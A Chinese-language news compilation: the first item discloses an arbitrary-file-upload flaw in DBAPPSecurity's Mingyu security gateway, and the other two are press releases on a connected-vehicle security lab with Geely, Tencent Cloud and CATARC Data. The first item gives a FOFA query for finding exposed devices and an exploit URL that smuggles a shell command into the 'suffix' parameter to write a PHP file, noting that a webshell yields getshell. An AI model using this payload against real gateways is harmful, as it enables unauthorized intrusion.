1. 安恒信息明御安全网关存在任意文件上传漏洞 附POC
安恒信息明御安全网关存在任意文件上传漏洞,用户可利用此漏洞上传webshell。该漏洞影响所有版本的明御安全网关,用户可使用以下fofa查询语句进行检测:title="明御安全网关"。漏洞复现实例如下:
利用漏洞链接:https://127.0.0.1/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%2241506657%22+%3E+.87919.php上传文件。若返回包出现 "success",证明文件已成功上传。通过拼接上传的文件路径:https://127.0.0.1/webui/.87919.php,可查看上传内容,若替换内容为一句话木马,即可实现getshell。
为确保网络安全,强烈建议受影响的用户尽快采取修复措施。同时,为方便学习与研究,关注公众号"南风漏洞复现文库"并回复"漏洞复现58"即可获取相关POC工具下载地址。在使用时,请严格遵守法律法规,仅用于学习与研究目的,切勿用于非法测试或活动。
2. 吉利研究院、腾讯云、中汽数据、安恒信息签署战略合作
2022年1月11日,腾讯云、吉利汽车研究院、中汽数据和安恒信息联合签署车联网网络安全实验室战略合作框架,并举行了实验室揭牌仪式。四方将正式在车联网网络安全领域展开全方位合作,共建行业领先的智能网联汽车安全运营体系。
吉利汽车研究院院长康国旺、副院长任向飞,腾讯智慧出行副总裁钟学丹、腾讯安全策略发展中心总经理吕一平,中汽数据有限公司总经理冯屹,安恒信息董事长范渊等共同出席了本次签约和揭牌仪式。
根据国务院印发的《新能源汽车产业发展规划(2021-2035 年)》文件显示,到2025年,我国智能汽车销量将达到当年汽车总销量20%,其中有条件自动驾驶智能网联汽车销量占比30%;而到2030年,这两个数字将分别达到40%和70%。
伴随车联网智能化进程的不断推进,车联网网络安全需要解决诸多问题,例如确保数字基础设施完整性、建立风险缓解及应对策略、抵御恶意攻击访问等。而由于汽车安全关系到人身安全,网络安全在其中的重要性更加不言而喻,国家发改委发布的《智能汽车创新发展战略》,也明确把“建立全面高效的智能汽车网络安全体系”作为六大战略目标之一。此次四方成立网络安全实验室,是立足国家战略、着眼产业发展的有力举措。
吉利汽车研究院院长康国旺表示:“车联网安全是吉利未来关键基石之一,吉利愿意和业界一流安全企业打造新型战略合作伙伴关系,通过建设业内顶尖的车联网实验室仅仅是多方合作的第一步,引入合作伙伴安全基因和能力,共创共赢车联网安全新业态,更是吉利车联网安全的下一步发展战略。”
“应对智能网联汽车的安全挑战,离不开产业各界的开放合作,协同研究。”腾讯智慧出行副总裁钟学丹表示,四方联合成立安全实验室,是汽车网络安全领域里颇具意义的跨界联手,腾讯将贡献多年来在汽车安全领域的前沿研究成果,与吉利研究院、中汽数据、安恒一同开放共创,将网络安全建设融入整车研发制造全流程,共建行业领先的智能网联汽车安全运营体系,护航汽车产业安全建设。
腾讯安全在车联网安全方面积累了国际领先安全研究成果,以科恩实验室为代表的腾讯安全团队已在智能网联汽车网络安全领域输出多个如特斯拉、宝马、丰田等网联汽车的国际级研究成果,并为20余家整车企业提供网联汽车安全解决方案和专家服务。
此次签约也标志着腾讯与吉利汽车集团的合作再进一步。2021年1月,腾讯与吉利汽车集团签署战略合作协议,围绕智能座舱、自动驾驶、数字化营销、数字化底座、数字化新业务及低碳发展等领域展开全方位战略合作。2021年8月,腾讯与吉利工业互联网平台总部广域铭岛在重庆签署战略合作协议,双方将携手在工业互联网行业生态、工业智能协同创新等领域展开深入合作。
此次四方战略合作,将进一步打造智能网联汽车安全产品,将网络安全建设融入整车研发制造流程,提升智能网联汽车云管端一体化的网络安全水平,提供可以覆盖全场景的智联网联汽车网络安全能力,积极树立差异化的网络安全技术优势。
3. 安恒信息与吉利研究院、腾讯云、中汽数据达成四方战略合作
1月11日,吉利汽车研究院、中汽数据、腾讯云、安恒信息举行签约仪式,宣布签署车联网网络安全实验室战略合作框架,并举行实验室揭牌仪式,四方正式在车联网网络安全领域展开全方位合作。这标志着安恒信息将在车联网生态领域提供更全面的安全能力。
当前,安恒信息已经和国内多个汽车企业、政府单位达成深度战略合作。安恒信息车联网安全解决方案,以“云、管、端,芯”一体化纵深安全防护体系建设为核心目标,涵盖实验室建设、安全检测防护、专业人才培养等多方位的安全建设需求,致力于车联网信息安全能力全方位应用,以进一步保障智慧交通的信息安全建设。
未来,安恒信息将全面深化运用数据安全分级分类、访问控制、国密算法、入侵检测等先进技术,完善涵盖智能网联汽车、移动智能终端、智慧交通服务平台以及多种类型网络通信的多级多域的防护体系,借助大数据分析、边缘计算、人工智能技术逐步实现智能网联汽车的可信安全体系建设,推动智能网联汽车的网络安全产业的快速发展。